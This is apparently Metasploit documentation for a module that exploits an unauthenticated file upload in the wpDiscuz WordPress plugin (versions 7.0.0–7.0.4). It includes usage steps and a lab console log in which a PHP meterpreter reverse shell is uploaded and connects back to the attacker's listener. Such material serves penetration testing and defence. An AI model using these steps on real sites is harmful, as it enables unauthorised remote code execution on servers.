## Vulnerable Application

This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin
versions >= `v7.0.0` and <= `v7.0.4`. This flaw gave unauthenticated attackers
the ability to upload arbitrary files, including PHP files, and achieve remote
code execution on a vulnerable site’s server.

A vulnerable version of the wpDiscuz plugin can be downloaded from [here](https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip).

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload`
4. Do: `set BLOGPATH <path>`
5. Do: `set RHOSTS <ip>`
6. Do: `run`
7. You should get a shell.

## Options

### BLOGPATH

Path to the target Wordpress blog.

## Scenarios

### Wordpress `5.7.2` with wpDiscuz `7.0.4` on Ubuntu 18.04

```
msf6 > use exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set rhost 192.168.37.135
rhost => 192.168.37.135
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > set blogpath index.php/2021/06/23/hello-world/
blogpath => index.php/2021/06/23/hello-world/
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[+] Payload uploaded as ksKFgaD.php
[*] Calling payload...
[*] Sending stage (39282 bytes) to 192.168.37.135
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.135:40444) at 2021-06-23 18:11:41 -0500
[!] This exploit may require manual cleanup of 'ksKFgaD.php' on the target

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux
meterpreter >
```
